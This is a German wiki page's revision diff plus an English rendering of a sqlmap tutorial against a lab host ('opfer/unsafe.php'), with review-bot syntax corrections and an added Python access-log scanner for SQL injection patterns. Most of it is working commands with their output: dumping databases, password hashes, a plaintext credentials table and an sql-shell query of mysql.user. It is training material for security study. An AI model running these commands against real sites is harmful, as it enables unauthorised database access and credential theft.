Using sqlmap: Difference between revisions
| (27 intermediate revisions by 2 users not shown) | |||
| Zeile 1: | Zeile 1: | ||
=Augabe aller Parameter und Optionen= | =Augabe aller Parameter und Optionen= | ||
*sqlmap -hh | *sqlmap -hh | ||
| − | =Angriff und Auflisten der | + | =Angriff und Auflisten der Datenbanken= |
| − | *sqlmap "opfer | + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -dbs |
;Infos | ;Infos | ||
<pre> | <pre> | ||
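Review bot: The new database-listing command on the "+" side passes -dbs with a single dash; sqlmap documents this switch as --dbs, and the other commands added in this revision use the double-dash form (--tables, --dump, --columns). Suggest: sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --dbs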
| Zeile 16: | Zeile 16: | ||
[*] sql_injections | [*] sql_injections | ||
</pre> | </pre> | ||
| + | |||
=Auslesen der Tabellen der Datenbank= | =Auslesen der Tabellen der Datenbank= | ||
| − | *sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections - | + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -D sql_injections --tables |
| + | <pre> | ||
| + | [INFO] the back-end DBMS is MySQL | ||
| + | web server operating system: Linux Ubuntu | ||
| + | web application technology: Apache 2.4.7, PHP 5.5.9 | ||
| + | back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) | ||
| + | [17:27:23] [INFO] fetching tables for database: 'sql_injections' | ||
| + | Database: sql_injections | ||
| + | [3 tables] | ||
| + | +----------+ | ||
| + | | benutzer | | ||
| + | | my_auth | | ||
| + | | users | | ||
| + | +----------+ | ||
| + | </pre> | ||
| + | |||
| + | =Auslesen der Passwort-Hashes aus der Datenbank= | ||
| + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --passwords | ||
| + | *Interaktiv kann man hier einen Dictionary-based Angriff starten | ||
| + | <pre> | ||
| + | [INFO] fetching database users password hashes | ||
| + | do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] | ||
| + | do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n | ||
| + | database management system users password hashes: | ||
| + | [*] debian-sys-maint [1]: | ||
| + | password hash: *147B31EA7C00D57209D0EA62664670E43494DB28 | ||
| + | [*] root [1]: | ||
| + | password hash: *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] xinux [1]: | ||
| + | password hash: *62F4DA5CDA990E074B00EC1AB958B67F617E09ED | ||
| + | </pre> | ||
| + | |||
| + | =Dump der Datenbanktabellen= | ||
| + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -D sql_injections --dump | ||
| + | |||
| + | =Struktur einer einzelnen Tabelle auslesen= | ||
| + | *sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --columns -D sql_injections -T my_auth | ||
| + | <pre> | ||
| + | [INFO] fetching columns for table 'my_auth' in database 'sql_injections' | ||
| + | Database: sql_injections | ||
| + | Table: my_auth | ||
| + | [2 columns] | ||
| + | +----------+-------------+ | ||
| + | | Column | Type | | ||
| + | +----------+-------------+ | ||
| + | | user | varchar(64) | | ||
| + | | password | varchar(64) | | ||
| + | +----------+-------------+ | ||
| + | </pre> | ||
| + | |||
| + | =Daten aus einer Tabelle auslesen= | ||
| + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --dump -D sql_injections -T my_auth | ||
| + | <pre> | ||
| + | [INFO] fetching entries for table 'my_auth' in database 'sql_injections' | ||
| + | Database: sql_injections | ||
| + | Table: my_auth | ||
| + | [12 entries] | ||
| + | +-----------+-----------+ | ||
| + | | user | password | | ||
| + | +-----------+-----------+ | ||
| + | | erwin | 123456 | | ||
| + | | thomas | password | | ||
| + | | otto | 12345678 | | ||
| + | | admin | 1234 | | ||
| + | | karl | letmein | | ||
| + | | sabine | 123Start$ | | ||
| + | | petra | pussy | | ||
| + | | tina | 12345 | | ||
| + | | kirstin | dragon | | ||
| + | | christine | qwerty | | ||
| + | | doris | 696969 | | ||
| + | | rudi | mustang | | ||
| + | +-----------+-----------+ | ||
| + | </pre> | ||
| + | |||
| + | =sql-Shell für Abfragen (SELECT-Query)= | ||
| + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --sql-shell -D sql_injections | ||
| + | |||
| + | [17:19:20] [INFO] the back-end DBMS is MySQL | ||
| + | web server operating system: Linux Ubuntu | ||
| + | web application technology: Apache 2.4.7, PHP 5.5.9 | ||
| + | back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) | ||
| + | [17:19:20] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER | ||
| + | <span style=color:red>sql-shell> select host,user,password from mysql.user;</span> | ||
| + | [17:20:00] [INFO] fetching SQL SELECT statement query output: 'select host,user,password from mysql.user' | ||
| + | select host,user,password from mysql.user [6]: | ||
| + | [*] localhost, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] opfer, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] 127.0.0.1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] ::1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] localhost, debian-sys-maint, *147B31EA7C00D57209D0EA62664670E43494DB28 | ||
| + | [*] localhost, xinux, *62F4DA5CDA990E074B00EC1AB958B67F617E09ED | ||
=Aufruf des Wizards= | =Aufruf des Wizards= | ||
*geführt und interaktiv | *geführt und interaktiv | ||
*sqlmap --wizard | *sqlmap --wizard | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
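Review bot: In the added section "Struktur einer einzelnen Tabelle auslesen" the command lacks -u and still targets opfer.secure.local, while every other command added in this revision uses -u "opfer/unsafe.php?..."; as written the URL is not passed through the target option. Suggest: sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --columns -D sql_injections -T my_auth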
Current revision as of 27 October 2021, 14:41
Listing all parameters and options
- sqlmap -hh
Attacking and listing the databases
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --dbs
- Info
[16:48:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:48:08] [INFO] fetching database names
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sql_injections
Reading the tables of the database
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -D sql_injections --tables
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:27:23] [INFO] fetching tables for database: 'sql_injections'
Database: sql_injections
[3 tables]
+----------+
| benutzer |
| my_auth  |
| users    |
+----------+
Reading the password hashes from the database
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --passwords
- A dictionary-based attack can be started interactively here
[INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *147B31EA7C00D57209D0EA62664670E43494DB28
[*] root [1]:
password hash: *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] xinux [1]:
password hash: *62F4DA5CDA990E074B00EC1AB958B67F617E09ED
Dumping the database tables
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -D sql_injections --dump
Reading the structure of a single table
- sqlmap -u "opfer.secure.local/unsafe.php?search=test&submit=Suche" --columns -D sql_injections -T my_auth
[INFO] fetching columns for table 'my_auth' in database 'sql_injections'
Database: sql_injections
Table: my_auth
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| user     | varchar(64) |
| password | varchar(64) |
+----------+-------------+
Reading data from a table
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --dump -D sql_injections -T my_auth
[INFO] fetching entries for table 'my_auth' in database 'sql_injections'
Database: sql_injections
Table: my_auth
[12 entries]
+-----------+-----------+
| user      | password  |
+-----------+-----------+
| erwin     | 123456    |
| thomas    | password  |
| otto      | 12345678  |
| admin     | 1234      |
| karl      | letmein   |
| sabine    | 123Start$ |
| petra     | pussy     |
| tina      | 12345     |
| kirstin   | dragon    |
| christine | qwerty    |
| doris     | 696969    |
| rudi      | mustang   |
+-----------+-----------+
SQL shell for queries (SELECT query)
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --sql-shell -D sql_injections
[17:19:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:19:20] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select host,user,password from mysql.user;
[17:20:00] [INFO] fetching SQL SELECT statement query output: 'select host,user,password from mysql.user'
select host,user,password from mysql.user [6]:
[*] localhost, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] opfer, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] 127.0.0.1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] ::1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] localhost, debian-sys-maint, *147B31EA7C00D57209D0EA62664670E43494DB28
[*] localhost, xinux, *62F4DA5CDA990E074B00EC1AB958B67F617E09ED
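Seen from the defender's side, every command above reaches unsafe.php as ordinary HTTP requests and therefore shows up in the web server's access log. The following added example (not part of the original wiki page) scans Apache combined-format log lines for sqlmap's default User-Agent and for SQL syntax in query parameters; the log lines, IP addresses and the sqlmap version string are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache "combined" log lines; IPs are documentation addresses
# and the sqlmap version in the User-Agent is made up for the sample.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Oct/2021:16:47:01 +0200] "GET /unsafe.php?search=test&submit=Suche HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.66 - - [27/Oct/2021:16:48:02 +0200] "GET /unsafe.php?search=test&submit=Suche HTTP/1.1" 200 512 "-" "sqlmap/1.5.10#stable (http://sqlmap.org)"
192.0.2.66 - - [27/Oct/2021:16:48:03 +0200] "GET /unsafe.php?search=test%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-&submit=Suche HTTP/1.1" 200 498 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.10 - - [27/Oct/2021:16:49:10 +0200] "GET /unsafe.php?search=O%27Brien&submit=Suche HTTP/1.1" 200 300 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"')

# SQL fragments that have no place in a search term. A lone quote is
# deliberately not matched, so names like O'Brien do not raise alerts.
SQLI_RE = re.compile(
    r"\bunion\b.*\bselect\b|\b(?:and|or)\s+\d+\s*=\s*\d+|\bsleep\s*\("
    r"|\binformation_schema\b|--\s|/\*", re.I)

def scan(log_text):
    """Return (client_ip, reasons) for every suspicious request line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format, skip
        ip, url, agent = m.group("ip", "url", "agent")
        reasons = []
        # Default sqlmap User-Agent; client-controlled, so only a weak signal.
        if agent.lower().startswith("sqlmap/"):
            reasons.append("sqlmap user agent")
        # parse_qsl percent-decodes, so encoded payloads are seen in clear.
        for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            if SQLI_RE.search(value):
                reasons.append(f"SQL syntax in parameter '{name}'")
        if reasons:
            findings.append((ip, reasons))
    return findings

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "; ".join(reasons))
```

Only the query string is inspected here; parameters sent in a POST body do not appear in a standard access log and need application-level or WAF logging.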
Calling the wizard
- guided and interactive
- sqlmap --wizard